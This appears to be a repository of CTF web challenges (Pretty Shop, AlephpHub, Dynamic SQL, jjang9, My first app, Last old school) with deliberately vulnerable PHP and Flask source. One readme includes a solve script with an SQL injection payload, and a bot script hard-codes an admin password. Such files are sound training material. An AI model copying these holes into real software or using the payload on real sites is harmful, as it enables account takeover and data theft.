any directory part and the page is accepted only if templates/<name>.html exists under the document root; returns NULL otherwise 17 | $filename = $_SERVER['DOCUMENT_ROOT'].'/templates/'.basename($page).'.html'; 18 | if(file_exists($filename)) { 19 | return basename($page); 20 | } 21 | } 22 | 23 | function anti_sqli($data) { // anti sqlite injection -- NOTE(review): quote doubling only protects values placed inside single-quoted SQL literals and has to be applied at every use; prepared statements are the robust alternative 24 | return str_replace("'", "''", $data); 25 | } 26 | -------------------------------------------------------------------------------- /2018/hackingcamp18/html/index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2018/hackingcamp18/html/templates/header.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Pretty Shop 5 | 6 | 7 | 8 | 9 | 10 |
11 | {MENU} 12 | -------------------------------------------------------------------------------- /2018/hackingcamp18/html/templates/home.html: -------------------------------------------------------------------------------- 1 |

Pretty Shop

2 |

Event - 30% off all items

-------------------------------------------------------------------------------- /2018/hackingcamp18/html/templates/login.html: -------------------------------------------------------------------------------- 1 | 13 | 14 |

login

15 |
16 |
17 |
18 | 19 |
20 |
-------------------------------------------------------------------------------- /2018/hackingcamp18/html/templates/logout.html: -------------------------------------------------------------------------------- 1 | bye -------------------------------------------------------------------------------- /2018/hackingcamp18/html/templates/mypage.html: -------------------------------------------------------------------------------- 1 |

mypage

2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 |
Username :  {USERNAME}
Money      :  ${MONEY}
-------------------------------------------------------------------------------- /2018/hackingcamp18/html/templates/register.html: -------------------------------------------------------------------------------- 1 | 13 | 14 |

register

15 |
16 |
17 |
18 | 19 |
20 |
-------------------------------------------------------------------------------- /2018/hackingcamp18/readme.md: -------------------------------------------------------------------------------- 1 | # Pretty Shop (Hackingcamp 18) 2 | 3 | ``` 4 | 문제명 (Challenge name) : Pretty shop 5 | 출제자 (Author) : 문시우 6 | 난이도 (Difficulty) : Easy 7 | ``` 8 | 9 | ### 문제 셋팅 (Settings) 10 | 11 | 환경 : `apache2, php7.2.7, sqlite3` 12 | 13 | 1. apache2 설치하고 mod_rewrite 모듈 로드 14 | $ sudo rewrite.load ../mods-enabled/ 15 | 16 | 2. apache2.conf에서 .htaccess 인식하도록 설정 17 | AllowOverride를 None에서 All로 바꿔주면 됨 18 | 19 | 3. sqlite3 설치 및 php-sqlite3 모듈 활성화 20 | $ sudo apt-get install sqlite3 21 | $ sudo apt-get install php-sqlite3 22 | $ /etc/php/7.x/apache2/php.ini 에서 ;extension=php_sqlite3.dll 앞에있는 ; 지우기 23 | 24 | 25 | ### 취약점 개요 (Vulnerability) 26 | 27 | Concept : Indirect sql injection in sqlite3 28 | 29 | `/classes/Shop.class.php` 에서 취약점 발생 30 | line 42 : `$user = $this->get_user_information($_SESSION['username']);` 31 | `get_user_information` 메소드로 `$_SESSION['username']`를 그대로 넘겨주고 있다. 
32 | 33 | 34 | ### 풀이 방법 (How to exploit) 35 | 36 | ```python 37 | from requests import post 38 | # pretty shop write up 39 | 40 | def main() : 41 | username = "username=-1'/**/and/**/0/**/or/**/username='admi'||'n';--" 42 | data = {"username": username, "password": "12345"} 43 | r = post('http://layer7.kr:6005/register', data=data) 44 | 45 | r = post('http://layer7.kr:6005/login', data=data) 46 | cookies = {'PHPSESSID':r.cookies['PHPSESSID']} 47 | 48 | get_flag = post('http://layer7.kr:6005/buy', data={'item':'flag'}, cookies=cookies) 49 | print(get_flag.text) 50 | 51 | if __name__ == '__main__' : 52 | main() 53 | ``` 54 | -------------------------------------------------------------------------------- /2018/hackingcamp18/www.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2018/hackingcamp18/www.zip -------------------------------------------------------------------------------- /2019/Belluminar/.htaccess: -------------------------------------------------------------------------------- 1 | RewriteEngine on 2 | RewriteRule "^(.*)$" "index.php" [QSA,NC,L] -------------------------------------------------------------------------------- /2019/Belluminar/classes/AlephDB/@Aleph.class.php: -------------------------------------------------------------------------------- 1 | host = __DB_HOST__; 7 | $this->port = __DB_PORT__; 8 | } 9 | 10 | private function encrypt_data($data) { 11 | $split_data = str_split($data); 12 | $retval = ''; 13 | 14 | foreach($split_data as $str) 15 | $retval .= $str ^ "\x01"; 16 | 17 | return $retval; 18 | } 19 | 20 | private function make_query($command, $data) { 21 | if($command == 'INSERT') 22 | $header = "\x01"; 23 | else if ($command == 'SELECT') 24 | $header = "\x02"; 25 | else if($command == 'DELETE') 26 | $header = "\x03"; 27 | 28 | $condition = json_decode($data, true); // json to array 29 | $send_data = 
$header; 30 | 31 | foreach ($condition as $key=>$val) { 32 | $val = $this->encrypt_data($val); 33 | $send_data .= "{$key}\xff{$val}\xff\x02"; 34 | } 35 | 36 | $send_data = substr($send_data, 0, -1)."\x01"; // End 37 | return $send_data; 38 | } 39 | 40 | private function select($data, $conn) { /* Sends a SELECT frame, reads the reply until socket_read() returns "", and returns the JSON-decoded reply (null when it is not valid JSON). */ 41 | $query = $this->make_query('SELECT', $data); 42 | socket_send($conn, $query, strlen($query), MSG_EOF); 43 | $select_data = ""; 44 | 45 | while(($read_data = socket_read($conn, 4096)) !== "") { /* NOTE(review): socket_read() returns false on error and false !== "" is true, so a failed read never leaves this loop; test for false as well. */ 46 | $select_data .= $read_data; 47 | } 48 | 49 | $retval = json_decode($select_data, true); 50 | return $retval; 51 | } 52 | 53 | private function insert($data, $conn) { /* Sends an INSERT frame; the socket_send() result is not checked and no reply is read, so this always returns true. */ 54 | $query = $this->make_query('INSERT',$data); 55 | socket_send($conn, $query, strlen($query), MSG_EOF); 56 | 57 | return true; 58 | } 59 | 60 | private function delete($data, $conn) { /* Sends a DELETE frame; like insert(), it reports true without checking the send or reading a reply. */ 61 | $query = $this->make_query('DELETE', $data); 62 | socket_send($conn, $query, strlen($query), MSG_EOF); 63 | 64 | return true; 65 | } 66 | 67 | public function query($command, $data) { /* Opens one TCP connection per call, dispatches on the upper-cased command and closes the socket. Array $data is JSON-encoded first. Returns the decoded reply for SELECT, true for INSERT/DELETE, false for any other command. */ 68 | $conn = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); 69 | socket_connect($conn, $this->host, $this->port); /* NOTE(review): the socket_create()/socket_connect() results are not checked; on failure the send/read calls below run on an unusable socket. */ 70 | 71 | if(is_array($data)) $data = json_encode($data); 72 | switch(strtoupper($command)) { 73 | case 'SELECT' : 74 | $retval = $this->select($data, $conn); 75 | break; 76 | case 'INSERT' : 77 | $retval = $this->insert($data, $conn); 78 | break; 79 | case 'DELETE' : 80 | $retval = $this->delete($data, $conn); 81 | break; 82 | default : 83 | $retval = false; 84 | } 85 | 86 | socket_close($conn); 87 | return $retval; 88 | } 89 | } 90 | -------------------------------------------------------------------------------- /2019/Belluminar/classes/AlephDB/Aleph.class.php: -------------------------------------------------------------------------------- 1 | query('SELECT', ['table' => 'videos']); 14 | return $retval; 15 | } 16 | 17 | public function get_user_info() { 18 | $user = $this->query('SELECT', ['table' => 'users', 'username' => 
$_SESSION['username']])[0]; 19 | return $user; 20 | } 21 | 22 | } 23 | -------------------------------------------------------------------------------- /2019/Belluminar/config/.htaccess: -------------------------------------------------------------------------------- 1 | Order deny, allow 2 | Deny from all -------------------------------------------------------------------------------- /2019/Belluminar/config/config.php: -------------------------------------------------------------------------------- 1 | '/', 17 | 'Videos' => '/videos', 18 | 'Upload' => '/upload', 19 | 'Mypage' => '/mypage', 20 | 'Logout' => '/logout', 21 | ]); 22 | 23 | define('__GUEST_MENU__', [ 24 | 'Main' => '/', 25 | 'Videos' => '/videos', 26 | 'Login' => '/login', 27 | 'Register' => '/register', 28 | ]); 29 | -------------------------------------------------------------------------------- /2019/Belluminar/config/function.php: -------------------------------------------------------------------------------- 1 | location.href=\"{$url}\";"; 4 | $execute .= strlen($msg) ? 
'alert("'.addslashes($msg).'");' : ''; 5 | $execute .= ''; die($execute); 6 | } 7 | 8 | function backward_url($msg="") { 9 | $execute = ''; die($execute); 12 | } 13 | 14 | function process_password($password) { /* Returns md5(sha256(sha1(md5($password) . __SALT__))) as a hex string. NOTE(review): nested fast digests with one site-wide salt are not a password hash; password_hash()/password_verify() is the replacement, at the cost of migrating stored hashes. */ 15 | return md5(hash('sha256', sha1(md5($password).__SALT__))); 16 | } 17 | 18 | function strtolower_callback($argv) { /* preg_replace_callback() handler: $argv[1] is the captured two characters; returns them lower-cased behind an "\x" prefix (presumably literal, since "{" is not a hex digit; confirm). */ 19 | return strtolower("\x{$argv[1]}"); 20 | } 21 | 22 | function escape_for_json($argv) { /* URL-encodes the input, then rewrites every %XX sequence through strtolower_callback. NOTE(review): hand-rolled escaping; confirm the consumer decodes exactly this form. */ 23 | $argv = urlencode($argv); 24 | return preg_replace_callback('/\%(.{2})/', 'strtolower_callback', $argv); 25 | } -------------------------------------------------------------------------------- /2019/Belluminar/config/server: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Belluminar/config/server -------------------------------------------------------------------------------- /2019/Belluminar/index.php: -------------------------------------------------------------------------------- 1 | 3 | -------------------------------------------------------------------------------- /2019/Belluminar/templates/header.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | @var(__TITLE__) 6 | 7 | 8 | 9 | 10 | 11 |
12 | @mun foreach($top_menu as $menu=>$url) 13 | @var($menu)  14 | @endforeach 15 | -------------------------------------------------------------------------------- /2019/Belluminar/templates/index.html: -------------------------------------------------------------------------------- 1 |

Main

2 |
3 | 4 | @var($msg)
5 |
6 | AlephpHub is a video sharing site.
7 | Anyone can watch the video, however uploads are limited to prevent spam.
8 | You can upload videos if you achieve attendance of 100 or more.
9 |
10 | Thank you! 11 |
12 | -------------------------------------------------------------------------------- /2019/Belluminar/templates/login.html: -------------------------------------------------------------------------------- 1 | 22 | 23 |

Login

24 | 29 | -------------------------------------------------------------------------------- /2019/Belluminar/templates/mypage.html: -------------------------------------------------------------------------------- 1 | 27 | 28 |

Mypage

29 |

30 | Username : @var($username)
31 | Joined date : @var($joined)
32 | Attendance : @var($attendance)
33 | Premium : @var($is_premium)
34 |

35 | 36 | 37 | -------------------------------------------------------------------------------- /2019/Belluminar/templates/read.html: -------------------------------------------------------------------------------- 1 | 14 | 15 | @mun if($is_writer) 16 |
17 | 18 | @endif 19 | 20 |

@var($title)

21 |

22 | Writer : @var($writer)
23 | Video url : https://www.youtube.com/watch?v=@var($video['video_id'])
24 | Video length : @var($video['video_length'])s 25 |

26 | 27 |

@var(nl2br($contents))

-------------------------------------------------------------------------------- /2019/Belluminar/templates/register.html: -------------------------------------------------------------------------------- 1 | 22 | 23 |

Register

24 |
25 |
26 | 27 | 28 |
29 |
-------------------------------------------------------------------------------- /2019/Belluminar/templates/upload.html: -------------------------------------------------------------------------------- 1 | 22 | 23 |

Upload (share)

24 | 25 |
26 |
27 |
28 |
29 | Example : https://www.youtube.com/watch?v=FcyU-GTrLlI

30 | 31 |
32 | 33 |
-------------------------------------------------------------------------------- /2019/Belluminar/templates/videos.html: -------------------------------------------------------------------------------- 1 |

Videos

2 | @mun foreach($videos as $video) 3 | 4 | 5 | 6 | @endforeach -------------------------------------------------------------------------------- /2019/Christmas_CTF/Dynamic_SQL/mild_taste(unintended)/config.php: -------------------------------------------------------------------------------- 1 | false, 'message' => 'Failed.']; 13 | 14 | $sql = "select * from {$table} where {$column['id']}='{$id}' and {$column['pw']}='{$pw}';"; 15 | if(!$result = $db->query($sql)) { 16 | $retval['message'] = 'query error'; 17 | die(json_encode($retval)); 18 | } 19 | 20 | if($fetch = $result->fetch_array(MYSQLI_NUM)) { 21 | $retval['result'] = true; 22 | $retval['message'] = "Hello, {$fetch[0]}\n"; 23 | 24 | if($fetch[0] == 'admin') 25 | $retval['message'] .= 'Can you read my note? zz'; 26 | else 27 | $retval['message'] .= "Note : {$fetch[2]}"; 28 | } 29 | 30 | clean_structure($db, $origin); 31 | echo json_encode($retval); -------------------------------------------------------------------------------- /2019/Christmas_CTF/Dynamic_SQL/mild_taste(unintended)/source.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Christmas_CTF/Dynamic_SQL/mild_taste(unintended)/source.zip -------------------------------------------------------------------------------- /2019/Christmas_CTF/Dynamic_SQL/mild_taste(unintended)/static/favicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Christmas_CTF/Dynamic_SQL/mild_taste(unintended)/static/favicon.png -------------------------------------------------------------------------------- /2019/Christmas_CTF/Dynamic_SQL/mild_taste(unintended)/static/pig.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Christmas_CTF/Dynamic_SQL/mild_taste(unintended)/static/pig.png -------------------------------------------------------------------------------- /2019/Christmas_CTF/Dynamic_SQL/mild_taste(unintended)/static/style.css: -------------------------------------------------------------------------------- 1 | body { 2 | background-color: #eeeeee; 3 | } 4 | 5 | .login-form input:not([type="radio"]), .login-form select { 6 | width: 100%; 7 | height: 50px; 8 | padding: 10px 20px 10px 20px; 9 | margin-bottom: 3px; 10 | border: #e0e0e0 0.5px solid; 11 | font-size: 15px; 12 | outline: none; 13 | } -------------------------------------------------------------------------------- /2019/Christmas_CTF/Dynamic_SQL/spicy_taste/config.php: -------------------------------------------------------------------------------- 1 | false, 'message' => 'Failed.']; 13 | 14 | $sql = "select * from {$table} where {$column['id']}='{$id}' and {$column['pw']}='{$pw}';"; 15 | if(!$result = $db->query($sql)) { 16 | $retval['message'] = 'query error'; 17 | die(json_encode($retval)); 18 | } 19 | 20 | if($fetch = $result->fetch_array(MYSQLI_NUM)) { 21 | $retval['result'] = true; 22 | $retval['message'] = "Hello, {$fetch[0]}\n"; 23 | 24 | if($fetch[0] == 'admin') 25 | $retval['message'] .= 'Can you read my note? 
zz'; 26 | else 27 | $retval['message'] .= "Note : {$fetch[2]}"; 28 | } 29 | 30 | clean_structure($db, $origin); 31 | echo json_encode($retval); -------------------------------------------------------------------------------- /2019/Christmas_CTF/Dynamic_SQL/spicy_taste/source.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Christmas_CTF/Dynamic_SQL/spicy_taste/source.zip -------------------------------------------------------------------------------- /2019/Christmas_CTF/Dynamic_SQL/spicy_taste/static/favicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Christmas_CTF/Dynamic_SQL/spicy_taste/static/favicon.png -------------------------------------------------------------------------------- /2019/Christmas_CTF/Dynamic_SQL/spicy_taste/static/pig.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Christmas_CTF/Dynamic_SQL/spicy_taste/static/pig.png -------------------------------------------------------------------------------- /2019/Christmas_CTF/Dynamic_SQL/spicy_taste/static/style.css: -------------------------------------------------------------------------------- 1 | body { 2 | background-color: #eeeeee; 3 | } 4 | 5 | .login-form input:not([type="radio"]), .login-form select { 6 | width: 100%; 7 | height: 50px; 8 | padding: 10px 20px 10px 20px; 9 | margin-bottom: 3px; 10 | border: #e0e0e0 0.5px solid; 11 | font-size: 15px; 12 | outline: none; 13 | } -------------------------------------------------------------------------------- /2019/Sunrin_Internet_High_School_CTF_2019/README.md: 
-------------------------------------------------------------------------------- 1 | # 2019 Sunrin Internet High School CTF 2 | 3 | `All prob were made by munsiwoo.` 4 | ``` 5 | jjang9 – http://httpd.shop:23905 6 | My first app – http://httpd.shop:23906 (소스코드는 깃허브에서 확인) 7 | Last old school – http://httpd.shop/last_old_school/ 8 | ``` 9 | 10 | 11 | 12 | * jjang9 (Web, PHP) 13 | * White box 14 | * PHP file system function trick 15 | * PHP Latest release version open_basedir bypass 16 | * Lfi to RCE 17 | * My first app (Web, Flask) 18 | * White box 19 | * Blind CSS Injection 20 | * Last old school (Web, PHP) 21 | * White box 22 | * Error Based SQL Injection 23 | 24 | 25 | ``` 26 | You can contact me via [mun.xiwoo@gmail.com] 27 | ``` 28 | -------------------------------------------------------------------------------- /2019/Sunrin_Internet_High_School_CTF_2019/jjang9/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Sunrin_Internet_High_School_CTF_2019/jjang9/0.png -------------------------------------------------------------------------------- /2019/Sunrin_Internet_High_School_CTF_2019/jjang9/README.md: -------------------------------------------------------------------------------- 1 | # jjang9 php.ini 2 | 3 | ``` 4 | open_basedir = /var/www:/tmp 5 | ``` 6 | 7 | ``` 8 | disable_functions = pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,system,exec,shell_exec,passthru,mail,symlink,imap_open,popen,unlink,rmdir,mkdir,rename 9 | ``` 10 | -------------------------------------------------------------------------------- 
/2019/Sunrin_Internet_High_School_CTF_2019/jjang9/index.html: -------------------------------------------------------------------------------- 1 |
2 |
3 | flag is in the /flag
4 | 
5 | * lfi.php
6 | * upload.php
7 | 


--------------------------------------------------------------------------------
/2019/Sunrin_Internet_High_School_CTF_2019/jjang9/lfi.php:
--------------------------------------------------------------------------------
 1 | alert("upload ok");location.href="'.$filename.'";');
18 | 	}
19 | 
20 | 	else {
21 | 		die('');
22 | 	}
23 | }
24 | ?>
25 | 
26 | 
27 | 
28 | 	
29 | 
30 | 
31 | 	
32 | 33 | 34 |
35 |
36 | source 37 | 38 | 39 | 40 | 41 | -------------------------------------------------------------------------------- /2019/Sunrin_Internet_High_School_CTF_2019/last_old_school/config.php: -------------------------------------------------------------------------------- 1 | query : {$query}
"; 16 | 17 | $_GET['pw'] = addslashes($_GET['pw']); 18 | $query = "select pw from user where id='admin' and pw='{$_GET['pw']}';"; 19 | $fetch = mysqli_fetch_assoc(mysqli_query($conn, $query)); 20 | 21 | if($fetch['pw'] === $_GET['pw']) { // Do you know the password for admin? 22 | die("

{$FLAG}

"); 23 | } 24 | 25 | show_source(__FILE__); 26 | 27 | -------------------------------------------------------------------------------- /2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/config.py: -------------------------------------------------------------------------------- 1 | import sqlite3 2 | 3 | def connect_db() : 4 | conn = sqlite3.connect('mydb.db') 5 | return conn 6 | 7 | def dict_factory(cursor, row): 8 | result = {} 9 | for idx, col in enumerate(cursor.description): 10 | result[col[0]] = row[idx] 11 | return result 12 | -------------------------------------------------------------------------------- /2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/mydb.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/mydb.db -------------------------------------------------------------------------------- /2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/static/eye.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/static/eye.png -------------------------------------------------------------------------------- /2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/static/mommyhand.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/static/mommyhand.png -------------------------------------------------------------------------------- /2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/static/munsiu.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/static/munsiu.png -------------------------------------------------------------------------------- /2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/static/peach.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/static/peach.png -------------------------------------------------------------------------------- /2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/static/sibariza.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/static/sibariza.png -------------------------------------------------------------------------------- /2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/templates/board.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Board 6 | 18 | 19 | 20 |

Board

21 | 22 | 23 |
24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | {% for post in post_list %} 33 | 34 | 35 | 36 | 37 | 38 | 39 | {% endfor %} 40 | 41 |
PidTitleUsernameAvatar
{{post['pid']}}{{post['title']}}{{post['username']}}
42 | 43 | 44 | 45 | -------------------------------------------------------------------------------- /2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/templates/home.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Home 5 | 6 | 7 |

Home

8 | 9 | 10 |
11 | 12 | {% if 'username' in session %} 13 | 14 | Hello, {{session['username']}}  
15 |
16 | you can see your profile here.
17 | you can use the free board here.
18 | you can report a post here.
19 | you can do logout here.
20 | 
21 | 22 | {% else %} 23 | 24 | Welcome, you can login here.
25 | If you want to register, you can do it here. 26 | 27 | {% endif %} 28 | 29 | 30 | -------------------------------------------------------------------------------- /2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/templates/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Login 6 | 7 | 8 |

Login

9 | 10 |
11 |
12 | 13 | 14 |
15 | 16 | {% with messages = get_flashed_messages() %} 17 | {% if messages %} 18 | {% for message in messages %} 19 | {{ message }} 20 | {% endfor %} 21 | {% endif %} 22 | {% endwith %} 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/templates/profile.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Profile 6 | 7 | 25 | 26 | 27 | 28 | 38 | 39 |

Hello, {{user['username']}}

40 |
41 |
42 | User ID : {{user['uid']}}
43 | Comment : {{user['comment']}} 44 |
45 | Your avatar
46 |
47 |
48 |
49 | You can choose avatar.
50 | 1. munsiu
51 | 2. mommyhand
52 | 3. peach
53 |
54 |
55 |
56 |
57 |
58 | 59 | Password : 60 | 61 |
62 | Press the "Save change" button If you want to apply avatar or change password. 63 |
64 | 65 |
66 |
67 |
68 | {% with messages = get_flashed_messages() %} 69 | {% if messages %} 70 | {% for message in messages %} 71 | {{ message }} 72 | {% endfor %} 73 | {% endif %} 74 | {% endwith %} 75 | 76 | 77 | 78 | -------------------------------------------------------------------------------- /2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/templates/read.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {{post['title']}} 6 | 12 | 13 | 14 |

Read post

15 | Title : {{post['title']}}
16 | Username : {{post['username']}} 17 |
18 | Contents 19 |
20 | {{post['contents']}}
21 | 
22 |
23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/templates/register.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Register 6 | 7 | 8 |

Register

9 | 10 |
11 |
12 |
13 | 14 | 15 |
16 | 17 | {% with messages = get_flashed_messages() %} 18 | {% if messages %} 19 | {% for message in messages %} 20 | {{ message }} 21 | {% endfor %} 22 | {% endif %} 23 | {% endwith %} 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/templates/report.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Report 6 | 12 | 13 | 14 |

Report

15 | You can report a post by sending a post URL to admin. 16 |

17 |
18 | Post URL : 19 | 20 |
21 | Example) http://httpd.shop:23906/read/1 22 |
23 | 24 |
25 | 26 |
27 |
28 | 29 | {% with messages = get_flashed_messages() %} 30 | {% if messages %} 31 | {% for message in messages %} 32 | {{ message }} 33 | {% endfor %} 34 | {% endif %} 35 | {% endwith %} 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/templates/write.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Write 5 | 18 | 19 | 20 | 21 |

Write

22 | 23 |
24 |
25 |
26 | 27 |
28 | 29 | {% with messages = get_flashed_messages() %} 30 | {% if messages %} 31 | {% for message in messages %} 32 | {{ message }} 33 | {% endfor %} 34 | {% endif %} 35 | {% endwith %} 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/chromedriver: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/chromedriver -------------------------------------------------------------------------------- /2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/robot.py: -------------------------------------------------------------------------------- 1 | from selenium import webdriver 2 | from selenium.webdriver.chrome.options import Options 3 | from selenium.common.exceptions import TimeoutException 4 | 5 | import time, sqlite3 6 | # admin robot selenium 7 | # made by munsiwoo 8 | 9 | def driver_init() : 10 | global driver 11 | 12 | chrome_options = Options() 13 | chrome_options.add_argument('--no-sandbox') 14 | chrome_options.add_argument('--window-size=1420,1080') 15 | chrome_options.add_argument('--headless') 16 | chrome_options.add_argument('--disable-gpu') 17 | 18 | driver = webdriver.Chrome(executable_path='/home/chromedriver', chrome_options=chrome_options) 19 | driver.implicitly_wait(3) 20 | driver.set_page_load_timeout(3) 21 | 22 | def dict_factory(cursor, row): 23 | result = {} 24 | for idx, col in enumerate(cursor.description): 25 | result[col[0]] = row[idx] 26 | return result 27 | 28 | 29 | def set_admin_password() : 30 | global conn 31 | c = conn.cursor() 32 | 33 | query = "update users set password=? 
where username='admin'" 34 | c.execute(query, (admin_password, )) 35 | conn.commit() 36 | 37 | return True 38 | 39 | def get_report_url() : # Take the oldest queued report (lowest rid), delete its row and return its url; False when the queue is empty. 40 | global conn 41 | conn.row_factory = dict_factory 42 | c = conn.cursor() 43 | 44 | query = 'select * from report order by rid limit 1' 45 | c.execute(query) 46 | fetch = c.fetchone() 47 | 48 | if fetch : 49 | rid = fetch['rid'] 50 | c.execute('delete from report where rid={}'.format(rid)) # NOTE(review): rid is formatted into the SQL text; bind it as set_admin_password does: c.execute('delete from report where rid=?', (rid,)) 51 | conn.commit() 52 | 53 | return fetch['url'] 54 | 55 | return False 56 | 57 | 58 | if __name__ == '__main__' : # Bot loop: for each queued URL, make sure the browser is logged in as admin, then load the URL. 59 | 60 | conn = sqlite3.connect('/home/prob/mydb.db') 61 | admin_password = 'b3a51a' # NOTE(review): admin credential is hard-coded in the source; read it from the environment or a secret store. 62 | driver_init() 63 | 64 | while True : 65 | try : 66 | report_url = get_report_url() 67 | if report_url : 68 | driver.get('http://httpd.shop:23906/profile') 69 | 70 | if driver.current_url == 'http://httpd.shop:23906/login' : 71 | set_admin_password() 72 | driver.execute_script("document.querySelector('[name=\"username\"]').value = 'admin'") 73 | driver.execute_script("document.querySelector('[name=\"password\"]').value = '{}'".format(admin_password)) 74 | time.sleep(0.5) 75 | driver.execute_script("document.querySelector('[type=\"submit\"]').click()") 76 | time.sleep(1) 77 | 78 | driver.get(report_url) # NOTE(review): the stored URL is opened as-is in the admin session; no scheme/host allow-list is visible in this file, so confirm it is validated where reports are submitted. 79 | print('next', flush=True) 80 | 81 | else : 82 | time.sleep(1) 83 | 84 | except : # NOTE(review): bare except also catches KeyboardInterrupt/SystemExit and hides the error; catch Exception and log it before restarting the driver. 85 | driver.quit() 86 | driver = None 87 | driver_init() 88 | -------------------------------------------------------------------------------- /2019/rename/backup/index.html: -------------------------------------------------------------------------------- 1 | blind -------------------------------------------------------------------------------- /2019/rename/index.php: -------------------------------------------------------------------------------- 1 |

Image preview service

2 |

Upload your file!

3 |
4 | 5 | 6 |
7 |
8 |

this web application is open source!
9 | upload.php source

10 | -------------------------------------------------------------------------------- /2019/rename/upload.php: -------------------------------------------------------------------------------- 1 | Preview your uploaded file ({$size[0]}x{$size[1]})

"; 44 | echo ''; 45 | } 46 | else { 47 | echo '

backup failed.

